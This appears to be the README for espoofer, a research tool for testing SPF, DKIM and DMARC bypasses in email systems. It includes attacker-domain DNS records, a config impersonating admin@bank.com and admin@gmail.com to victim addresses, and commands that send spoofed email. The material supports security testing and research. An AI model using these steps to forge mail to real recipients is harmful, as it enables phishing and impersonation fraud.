Espoofer is an open-source testing tool to bypass SPF, DKIM, and DMARC authentication in email systems. It helps mail server administrators and penetration testers to check whether the target email server and client are vulnerable to email spoofing attacks or can be abused to send spoofing emails.
Why build this tool?
Email spoofing is a big threat to both individuals and organizations (Yahoo breach, John podesta). To address this problem, modern email services and websites employ authentication protocols — SPF, DKIM, and DMARC — to prevent email forgery.
Our latest research shows that the implementation of those protocols suffers a number of security issues, which can be exploited to bypass SPF/DKIM/DMARC protections. Figure 1 demonstrates one of our spoofing attacks to bypass DKIM and DMARC in Gmail. For more technical details, please see our Black Hat USA 2020 talk (with presentation video) or USENIX security 2020 paper.
- Black Hat USA 2020 slides (PDF): You have No Idea Who Sent that Email: 18 Attacks on Email Sender Authentication
- USENIX security 2020 paper (PDF): Composition Kills: A Case Study of Email Sender Authentication
- Distinguished Paper Award Winner
In this repo, we summarize all test cases we found and integrate them into this tool to help administrators and security-practitioners quickly identify and locate such security issues.Please use the following citation if you do scentific research (Click me).
- Download this tool
git clone https://github.com/chenjj/espoofer
- Install dependencies
sudo pip3 install -r requirements.txt
Usage
espoofer has three work modes: server (‘s’, default mode), client (‘c’) and manual (‘m’). In server mode, espoofer works like a mail server to test validation in receiving services. In client mode, espoofer works as an email client to test validation in sending services. Manual mode is used for debug purposes.
Server mode
To run espoofer in server mode, you need to have: 1) an IP address (1.2.3.4), which outgoing port 25 is not blocked by the ISP, and 2) a domain (attack.com).
Domain configuration
- Set DKIM public key for
attack.com
selector._domainkey.attacker.com TXT “v=DKIM1; k=rsa; t=y; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNjwdrmp/gcbKLaGQfRZk+LJ6XOWuQXkAOa/lI1En4t4sLuWiKiL6hACqMrsKQ8XfgqN76mmx4CHWn2VqVewFh7QTvshGLywWwrAJZdQ4KTlfR/2EwAlrItndijOfr2tpZRgP0nTY6saktkhQdwrk3U0SZmG7U8L9IPj7ZwPKGvQIDAQAB”
Set SPF record for attack.com
attack.com TXT “v=spf1 ip4:1.2.3.4 +all”
Configure the tool in config.py
config ={
“attacker_site”: b”attack.com”, # attack.com
“legitimate_site_address”: b”admin@bank.com”, # legitimate.com
“victim_address”: b”victim@victim.com”, # victim@victim.com
“case_id”: b”server_a1″, # server_a1
}
You can list find the case_id of all test cases using -l option:
python3 espoofer.py -l
You can change case_id in the config.py or use -id option in the command line to test different cases:
python3 espoofer.py -id server_a1
Client mode
To run epsoofer in client mode, you need to have an account on the target email services. This attack exploits the failure of some email services to perform sufficient validation of emails received from local MUAs. For example, attacker@gmail.com tries to impersonate admin@gmail.com.
- Configure the tool in config.py
config ={
“legitimate_site_address”: b”admin@gmail.com”,
“victim_address”: b”victim@victim.com”,
“case_id”: b”client_a1″,
“client_mode”: {
“sending_server”: (“smtp.gmail.com”, 587), # SMTP sending serve ip and port
“username”: b”attacker@gmail.com”, # Your account username and password
“password”: b”your_passward_here”,
},
}
You can list find the case_id of all test cases using -l option:
python3 espoofer.py -l
Note: sending_server should be the SMTP sending server address, not the receiving server address.
- Run the tool to send a spoofing email
python3 espoofer.py -m c
You can change case_id in the config.py and run it again, or you can use -id option in the command line:
python3 espoofer.py -m c -id client_a1
Manual mode
Here is an example of manual mode:
python3 espoofer.py -m m -helo attack.com -mfrom m@attack.com -rcptto victim@victim.com -data raw_msg_here -ip 127.0.0.1 -port 25
Screenshots
- A brief overview of test cases.
